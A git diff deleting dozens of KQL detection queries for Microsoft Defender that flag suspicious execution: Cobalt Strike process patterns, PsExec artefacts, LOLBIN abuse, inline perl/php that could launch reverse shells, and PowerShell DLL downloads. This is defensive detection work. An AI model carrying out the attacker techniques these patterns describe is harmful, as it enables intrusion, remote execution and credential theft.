-The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer.
-This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys"
-
-// Tags: attack.execution, attack.t1071.001
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith ":\\Windows\\System32\\dialer.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/Execution/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql b/Execution/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql
deleted file mode 100644
index 88e21026..00000000
--- a/Execution/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
-// Date: 2023/04/28
-// Level: medium
-// Description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses
-// Tags: attack.defense_evasion, attack.execution, attack.command_and_control, attack.t1218.011
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\winlogon.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/Execution/Outlook_EnableUnsafeClientMailRules_Setting_Enabled.kql b/Execution/Outlook_EnableUnsafeClientMailRules_Setting_Enabled.kql
deleted file mode 100644
index e7d4364e..00000000
--- a/Execution/Outlook_EnableUnsafeClientMailRules_Setting_Enabled.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2018/12/27
-// Level: high
-// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
-// Tags: attack.execution, attack.t1059, attack.t1202
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\Outlook\\Security\\EnableUnsafeClientMailRules"
\ No newline at end of file
diff --git a/Execution/PCRE.NET_Package_Image_Load.kql b/Execution/PCRE.NET_Package_Image_Load.kql
deleted file mode 100644
index 87180de7..00000000
--- a/Execution/PCRE.NET_Package_Image_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/29
-// Level: high
-// Description: Detects processes loading modules related to PCRE.NET package
-// Tags: attack.execution, attack.t1059
-DeviceImageLoadEvents
-| where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\"
\ No newline at end of file
diff --git a/Execution/PCRE.NET_Package_Temp_Files.kql b/Execution/PCRE.NET_Package_Temp_Files.kql
deleted file mode 100644
index 0db1282d..00000000
--- a/Execution/PCRE.NET_Package_Temp_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/29
-// Level: high
-// Description: Detects processes creating temp files related to PCRE.NET package
-// Tags: attack.execution, attack.t1059
-DeviceFileEvents
-| where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\"
\ No newline at end of file
diff --git a/Execution/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql b/Execution/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql
deleted file mode 100644
index 09b3d975..00000000
--- a/Execution/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/01
-// Level: medium
-// Description: Detect use of PDQ Deploy remote admin tool
-// Tags: attack.execution, attack.lateral_movement, attack.t1072
-DeviceProcessEvents
-| where ProcessVersionInfoFileDescription =~ "PDQ Deploy Console" or ProcessVersionInfoProductName =~ "PDQ Deploy" or ProcessVersionInfoCompanyName =~ "PDQ.com" or ProcessVersionInfoOriginalFileName =~ "PDQDeployConsole.exe"
\ No newline at end of file
diff --git a/Execution/PSEXEC_Remote_Execution_File_Artefact.kql b/Execution/PSEXEC_Remote_Execution_File_Artefact.kql
deleted file mode 100644
index 67f96f11..00000000
--- a/Execution/PSEXEC_Remote_Execution_File_Artefact.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/21
-// Level: high
-// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
-// Tags: attack.lateral_movement, attack.privilege_escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029
-DeviceFileEvents
-| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-"
\ No newline at end of file
diff --git a/Execution/PUA_-_AdvancedRun_Execution.kql b/Execution/PUA_-_AdvancedRun_Execution.kql
deleted file mode 100644
index 4e6050fc..00000000
--- a/Execution/PUA_-_AdvancedRun_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/20
-// Level: medium
-// Description: Detects the execution of AdvancedRun utility
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "AdvancedRun.exe" or (ProcessCommandLine contains " /EXEFilename " and ProcessCommandLine contains " /Run") or (ProcessCommandLine contains " /WindowState 0" and ProcessCommandLine contains " /RunAs " and ProcessCommandLine contains " /CommandLine ")
\ No newline at end of file
diff --git a/Execution/PUA_-_CsExec_Execution.kql b/Execution/PUA_-_CsExec_Execution.kql
deleted file mode 100644
index 8057d416..00000000
--- a/Execution/PUA_-_CsExec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/08/22
-// Level: high
-// Description: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative
-// Tags: attack.resource_development, attack.t1587.001, attack.execution, attack.t1569.002
-DeviceProcessEvents
-| where FolderPath endswith "\\csexec.exe" or ProcessVersionInfoFileDescription =~ "csexec"
\ No newline at end of file
diff --git a/Execution/PUA_-_NSudo_Execution.kql b/Execution/PUA_-_NSudo_Execution.kql
deleted file mode 100644
index a3bb925b..00000000
--- a/Execution/PUA_-_NSudo_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
-// Date: 2022/01/24
-// Level: high
-// Description: Detects the use of NSudo tool for command execution
-// Tags: attack.execution, attack.t1569.002, attack.s0029
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-U:S " or ProcessCommandLine contains "-U:T " or ProcessCommandLine contains "-U:E " or ProcessCommandLine contains "-P:E " or ProcessCommandLine contains "-M:S " or ProcessCommandLine contains "-M:H " or ProcessCommandLine contains "-U=S " or ProcessCommandLine contains "-U=T " or ProcessCommandLine contains "-U=E " or ProcessCommandLine contains "-P=E " or ProcessCommandLine contains "-M=S " or ProcessCommandLine contains "-M=H " or ProcessCommandLine contains "-ShowWindowMode:Hide") and ((FolderPath endswith "\\NSudo.exe" or FolderPath endswith "\\NSudoLC.exe" or FolderPath endswith "\\NSudoLG.exe") or (ProcessVersionInfoOriginalFileName in~ ("NSudo.exe", "NSudoLC.exe", "NSudoLG.exe")))
\ No newline at end of file
diff --git a/Execution/PUA_-_NirCmd_Execution.kql b/Execution/PUA_-_NirCmd_Execution.kql
deleted file mode 100644
index 68200d1c..00000000
--- a/Execution/PUA_-_NirCmd_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/24
-// Level: medium
-// Description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity
-// Tags: attack.execution, attack.t1569.002, attack.s0029
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " execmd " or ProcessCommandLine contains ".exe script " or ProcessCommandLine contains ".exe shexec " or ProcessCommandLine contains " runinteractive ") or (FolderPath endswith "\\NirCmd.exe" or ProcessVersionInfoOriginalFileName =~ "NirCmd.exe")) or ((ProcessCommandLine contains " exec " or ProcessCommandLine contains " exec2 ") and (ProcessCommandLine contains " show " or ProcessCommandLine contains " hide "))
\ No newline at end of file
diff --git a/Execution/PUA_-_NirCmd_Execution_As_LOCAL_SYSTEM.kql b/Execution/PUA_-_NirCmd_Execution_As_LOCAL_SYSTEM.kql
deleted file mode 100644
index d9debfcd..00000000
--- a/Execution/PUA_-_NirCmd_Execution_As_LOCAL_SYSTEM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/24
-// Level: high
-// Description: Detects the use of NirCmd tool for command execution as SYSTEM user
-// Tags: attack.execution, attack.t1569.002, attack.s0029
-DeviceProcessEvents
-| where ProcessCommandLine contains " runassystem "
\ No newline at end of file
diff --git a/Execution/PUA_-_Radmin_Viewer_Utility_Execution.kql b/Execution/PUA_-_Radmin_Viewer_Utility_Execution.kql
deleted file mode 100644
index 9edcca22..00000000
--- a/Execution/PUA_-_Radmin_Viewer_Utility_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/22
-// Level: medium
-// Description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines
-// Tags: attack.execution, attack.lateral_movement, attack.t1072
-DeviceProcessEvents
-| where ProcessVersionInfoFileDescription =~ "Radmin Viewer" or ProcessVersionInfoProductName =~ "Radmin Viewer" or ProcessVersionInfoOriginalFileName =~ "Radmin.exe"
\ No newline at end of file
diff --git a/Execution/PUA_-_RunXCmd_Execution.kql b/Execution/PUA_-_RunXCmd_Execution.kql
deleted file mode 100644
index fc892f3c..00000000
--- a/Execution/PUA_-_RunXCmd_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/24
-// Level: high
-// Description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts
-// Tags: attack.execution, attack.t1569.002, attack.s0029
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /account=system " or ProcessCommandLine contains " /account=ti ") and ProcessCommandLine contains "/exec="
\ No newline at end of file
diff --git a/Execution/PUA_-_Wsudo_Suspicious_Execution.kql b/Execution/PUA_-_Wsudo_Suspicious_Execution.kql
deleted file mode 100644
index 1282a6c6..00000000
--- a/Execution/PUA_-_Wsudo_Suspicious_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/02
-// Level: high
-// Description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)
-// Tags: attack.execution, attack.privilege_escalation, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-u System" or ProcessCommandLine contains "-uSystem" or ProcessCommandLine contains "-u TrustedInstaller" or ProcessCommandLine contains "-uTrustedInstaller" or ProcessCommandLine contains " --ti ") or (FolderPath endswith "\\wsudo.exe" or ProcessVersionInfoOriginalFileName =~ "wsudo.exe" or ProcessVersionInfoFileDescription =~ "Windows sudo utility" or InitiatingProcessFolderPath endswith "\\wsudo-bridge.exe")
\ No newline at end of file
diff --git a/Execution/Parent_in_Public_Folder_Suspicious_Process.kql b/Execution/Parent_in_Public_Folder_Suspicious_Process.kql
deleted file mode 100644
index 65b83f51..00000000
--- a/Execution/Parent_in_Public_Folder_Suspicious_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: This rule detects suspicious processes with parent images located in the C:\Users\Public folder
-// Tags: attack.defense_evasion, attack.execution, attack.t1564, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "wscript.exe" or ProcessCommandLine contains "cscript.exe" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "mshta.exe") and InitiatingProcessFolderPath startswith "C:\\Users\\Public\\"
\ No newline at end of file
diff --git a/Execution/Perl_Inline_Command_Execution.kql b/Execution/Perl_Inline_Command_Execution.kql
deleted file mode 100644
index c6389427..00000000
--- a/Execution/Perl_Inline_Command_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/02
-// Level: medium
-// Description: Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code.
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine contains " -e" and (FolderPath endswith "\\perl.exe" or ProcessVersionInfoOriginalFileName =~ "perl.exe")
\ No newline at end of file
diff --git a/Execution/Php_Inline_Command_Execution.kql b/Execution/Php_Inline_Command_Execution.kql
deleted file mode 100644
index d4eeee8a..00000000
--- a/Execution/Php_Inline_Command_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/02
-// Level: medium
-// Description: Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code.
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine contains " -r" and (FolderPath endswith "\\php.exe" or ProcessVersionInfoOriginalFileName =~ "php.exe")
\ No newline at end of file
diff --git a/Execution/Potential_Adplus.EXE_Abuse.kql b/Execution/Potential_Adplus.EXE_Abuse.kql
deleted file mode 100644
index 680e85fa..00000000
--- a/Execution/Potential_Adplus.EXE_Abuse.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/09
-// Level: high
-// Description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.
-// Tags: attack.defense_evasion, attack.execution, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -hang " or ProcessCommandLine contains " -pn " or ProcessCommandLine contains " -pmn " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " -po " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " -sc ") and (FolderPath endswith "\\adplus.exe" or ProcessVersionInfoOriginalFileName =~ "Adplus.exe")
\ No newline at end of file
diff --git a/Execution/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql b/Execution/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql
deleted file mode 100644
index 4d1541c8..00000000
--- a/Execution/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe".
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\ftp.exe" or ((ProcessCommandLine contains "-s:" or ProcessCommandLine contains "/s:") and (FolderPath endswith "\\ftp.exe" or ProcessVersionInfoOriginalFileName =~ "ftp.exe"))
\ No newline at end of file
diff --git a/Execution/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql b/Execution/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql
deleted file mode 100644
index 4d75232f..00000000
--- a/Execution/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2021/11/03
-// Level: medium
-// Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags.
-Attackers can abuse this utility in order to download arbitrary files via a configuration file.
-Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
-
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/vpn" and ProcessCommandLine contains "/lan") and (FolderPath endswith "\\cmdl32.exe" or ProcessVersionInfoOriginalFileName =~ "CMDL32.EXE")
\ No newline at end of file
diff --git a/Execution/Potential_Binary_Impersonating_Sysinternals_Tools.kql b/Execution/Potential_Binary_Impersonating_Sysinternals_Tools.kql
deleted file mode 100644
index e33493d3..00000000
--- a/Execution/Potential_Binary_Impersonating_Sysinternals_Tools.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/20
-// Level: medium
-// Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe" or FolderPath endswith "\\AccessEnum.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADInsight.exe" or FolderPath endswith "\\ADInsight64.exe" or FolderPath endswith "\\adrestore.exe" or FolderPath endswith "\\adrestore64.exe" or FolderPath endswith "\\Autologon.exe" or FolderPath endswith "\\Autologon64.exe" or FolderPath endswith "\\Autoruns.exe" or FolderPath endswith "\\Autoruns64.exe" or FolderPath endswith "\\autorunsc.exe" or FolderPath endswith "\\autorunsc64.exe" or FolderPath endswith "\\Bginfo.exe" or FolderPath endswith "\\Bginfo64.exe" or FolderPath endswith "\\Cacheset.exe" or FolderPath endswith "\\Cacheset64.exe" or FolderPath endswith "\\Clockres.exe" or FolderPath endswith "\\Clockres64.exe" or FolderPath endswith "\\Contig.exe" or FolderPath endswith "\\Contig64.exe" or FolderPath endswith "\\Coreinfo.exe" or FolderPath endswith "\\Coreinfo64.exe" or FolderPath endswith "\\CPUSTRES.EXE" or FolderPath endswith "\\CPUSTRES64.EXE" or FolderPath endswith "\\ctrl2cap.exe" or FolderPath endswith "\\Dbgview.exe" or FolderPath endswith "\\dbgview64.exe" or FolderPath endswith "\\Desktops.exe" or FolderPath endswith "\\Desktops64.exe" or FolderPath endswith "\\disk2vhd.exe" or FolderPath endswith "\\disk2vhd64.exe" or FolderPath endswith "\\diskext.exe" or FolderPath endswith "\\diskext64.exe" or FolderPath endswith "\\Diskmon.exe" or FolderPath endswith "\\Diskmon64.exe" or FolderPath endswith "\\DiskView.exe" or FolderPath endswith "\\DiskView64.exe" or FolderPath endswith "\\du.exe" or FolderPath endswith "\\du64.exe" or FolderPath endswith "\\efsdump.exe" or FolderPath endswith "\\FindLinks.exe" or FolderPath endswith "\\FindLinks64.exe" or FolderPath endswith "\\handle.exe" or FolderPath endswith "\\handle64.exe" or FolderPath endswith "\\hex2dec.exe" or FolderPath endswith "\\hex2dec64.exe" or FolderPath endswith "\\junction.exe" or FolderPath endswith "\\junction64.exe" or FolderPath endswith "\\ldmdump.exe" or FolderPath endswith "\\listdlls.exe" or FolderPath endswith "\\listdlls64.exe" or FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe" or FolderPath endswith "\\loadOrd.exe" or FolderPath endswith "\\loadOrd64.exe" or FolderPath endswith "\\loadOrdC.exe" or FolderPath endswith "\\loadOrdC64.exe" or FolderPath endswith "\\logonsessions.exe" or FolderPath endswith "\\logonsessions64.exe" or FolderPath endswith "\\movefile.exe" or FolderPath endswith "\\movefile64.exe" or FolderPath endswith "\\notmyfault.exe" or FolderPath endswith "\\notmyfault64.exe" or FolderPath endswith "\\notmyfaultc.exe" or FolderPath endswith "\\notmyfaultc64.exe" or FolderPath endswith "\\ntfsinfo.exe" or FolderPath endswith "\\ntfsinfo64.exe" or FolderPath endswith "\\pendmoves.exe" or FolderPath endswith "\\pendmoves64.exe" or FolderPath endswith "\\pipelist.exe" or FolderPath endswith "\\pipelist64.exe" or FolderPath endswith "\\portmon.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\procexp.exe" or FolderPath endswith "\\procexp64.exe" or FolderPath endswith "\\Procmon.exe" or FolderPath endswith "\\Procmon64.exe" or FolderPath endswith "\\psExec.exe" or FolderPath endswith "\\psExec64.exe" or FolderPath endswith "\\psfile.exe" or FolderPath endswith "\\psfile64.exe" or FolderPath endswith "\\psGetsid.exe" or FolderPath endswith "\\psGetsid64.exe" or FolderPath endswith "\\psInfo.exe" or FolderPath endswith "\\psInfo64.exe" or FolderPath endswith "\\pskill.exe" or FolderPath endswith "\\pskill64.exe" or FolderPath endswith "\\pslist.exe" or FolderPath endswith "\\pslist64.exe" or FolderPath endswith "\\psLoggedon.exe" or FolderPath endswith "\\psLoggedon64.exe" or FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe" or FolderPath endswith "\\pspasswd.exe" or FolderPath endswith "\\pspasswd64.exe" or FolderPath endswith "\\psping.exe" or FolderPath endswith "\\psping64.exe" or FolderPath endswith "\\psService.exe" or FolderPath endswith "\\psService64.exe" or FolderPath endswith "\\psshutdown.exe" or FolderPath endswith "\\psshutdown64.exe" or FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe" or FolderPath endswith "\\RAMMap.exe" or FolderPath endswith "\\RDCMan.exe" or FolderPath endswith "\\RegDelNull.exe" or FolderPath endswith "\\RegDelNull64.exe" or FolderPath endswith "\\regjump.exe" or FolderPath endswith "\\ru.exe" or FolderPath endswith "\\ru64.exe" or FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe" or FolderPath endswith "\\ShareEnum.exe" or FolderPath endswith "\\ShareEnum64.exe" or FolderPath endswith "\\shellRunas.exe" or FolderPath endswith "\\sigcheck.exe" or FolderPath endswith "\\sigcheck64.exe" or FolderPath endswith "\\streams.exe" or FolderPath endswith "\\streams64.exe" or FolderPath endswith "\\strings.exe" or FolderPath endswith "\\strings64.exe" or FolderPath endswith "\\sync.exe" or FolderPath endswith "\\sync64.exe" or FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\tcpvcon.exe" or FolderPath endswith "\\tcpvcon64.exe" or FolderPath endswith "\\tcpview.exe" or FolderPath endswith "\\tcpview64.exe" or FolderPath endswith "\\Testlimit.exe" or FolderPath endswith "\\Testlimit64.exe" or FolderPath endswith "\\vmmap.exe" or FolderPath endswith "\\vmmap64.exe" or FolderPath endswith "\\Volumeid.exe" or FolderPath endswith "\\Volumeid64.exe" or FolderPath endswith "\\whois.exe" or FolderPath endswith "\\whois64.exe" or FolderPath endswith "\\Winobj.exe" or FolderPath endswith "\\Winobj64.exe" or FolderPath endswith "\\ZoomIt.exe" or FolderPath endswith "\\ZoomIt64.exe") and (not((isnull(ProcessVersionInfoCompanyName) or (ProcessVersionInfoCompanyName in~ ("Sysinternals - www.sysinternals.com", "Sysinternals")))))
\ No newline at end of file
diff --git a/Execution/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql b/Execution/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql
deleted file mode 100644
index 17de2322..00000000
--- a/Execution/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/26
-// Level: medium
-// Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file
-// Tags: attack.execution, attack.t1106, attack.defense_evasion, attack.t1218, attack.t1127
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -cf ") and (FolderPath endswith "\\cdb.exe" or ProcessVersionInfoOriginalFileName =~ "CDB.Exe")
\ No newline at end of file
diff --git a/Execution/Potential_CobaltStrike_Process_Patterns.kql b/Execution/Potential_CobaltStrike_Process_Patterns.kql
deleted file mode 100644
index 03bf6e5d..00000000
--- a/Execution/Potential_CobaltStrike_Process_Patterns.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/07/27
-// Level: high
-// Description: Detects potential process patterns related to Cobalt Strike beacon activity
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and (InitiatingProcessCommandLine contains "cmd.exe /C echo" and InitiatingProcessCommandLine contains " > \\\\.\\pipe")) or (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and InitiatingProcessCommandLine endswith "/C whoami") or (ProcessCommandLine endswith "cmd.exe /C whoami" and InitiatingProcessFolderPath startswith "C:\\Temp\\") or ((ProcessCommandLine contains "cmd.exe /c echo" and ProcessCommandLine contains "> \\\\.\\pipe") and (InitiatingProcessFolderPath endswith "\\runonce.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe"))
\ No newline at end of file
diff --git a/Execution/Potential_CobaltStrike_Service_Installations_-_Registry.kql b/Execution/Potential_CobaltStrike_Service_Installations_-_Registry.kql
deleted file mode 100644
index e448ad48..00000000
--- a/Execution/Potential_CobaltStrike_Service_Installations_-_Registry.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Wojciech Lesicki
-// Date: 2021/06/29
-// Level: high
-// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
-
-// Tags: attack.execution, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1543.003, attack.t1569.002
-DeviceRegistryEvents
-| where ((RegistryValueData contains "ADMIN$" and RegistryValueData contains ".exe") or (RegistryValueData contains "%COMSPEC%" and RegistryValueData contains "start" and RegistryValueData contains "powershell")) and (RegistryKey contains "\\System\\CurrentControlSet\\Services" or (RegistryKey contains "\\System\\ControlSet" and RegistryKey contains "\\Services"))
\ No newline at end of file
diff --git a/Execution/Potential_CommandLine_Path_Traversal_Via_Cmd.EXE.kql b/Execution/Potential_CommandLine_Path_Traversal_Via_Cmd.EXE.kql
deleted file mode 100644
index 026648ff..00000000
--- a/Execution/Potential_CommandLine_Path_Traversal_Via_Cmd.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: xknow @xknow_infosec, Tim Shelton
-// Date: 2020/06/11
-// Level: high
-// Description: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking
-// Tags: attack.execution, attack.t1059.003
-DeviceProcessEvents
-| where (((InitiatingProcessCommandLine contains "/c" or InitiatingProcessCommandLine contains "/k" or InitiatingProcessCommandLine contains "/r") or (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/k" or ProcessCommandLine contains "/r")) and (InitiatingProcessFolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "cmd.exe") and (InitiatingProcessCommandLine =~ "/../../" or ProcessCommandLine contains "/../../")) and (not(ProcessCommandLine contains "\\Tasktop\\keycloak\\bin\\/../../jre\\bin\\java"))
\ No newline at end of file
diff --git a/Execution/Potential_Cookies_Session_Hijacking.kql b/Execution/Potential_Cookies_Session_Hijacking.kql
deleted file mode 100644
index 250526bc..00000000
--- a/Execution/Potential_Cookies_Session_Hijacking.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/27
-// Level: medium
-// Description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie data.
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine matches regex "\\s-c\\s" or ProcessCommandLine contains "--cookie-jar") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/Execution/Potential_DLL_File_Download_Via_PowerShell_Invoke-WebRequest.kql b/Execution/Potential_DLL_File_Download_Via_PowerShell_Invoke-WebRequest.kql
deleted file mode 100644
index 5451ccc8..00000000
--- a/Execution/Potential_DLL_File_Download_Via_PowerShell_Invoke-WebRequest.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Hieu Tran
-// Date: 2023/03/13
-// Level: medium
-// Description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet
-// Tags: attack.command_and_control, attack.execution, attack.t1059.001, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "IWR ") and (ProcessCommandLine contains "http" and ProcessCommandLine contains "OutFile" and ProcessCommandLine contains ".dll")
\ No newline at end of file
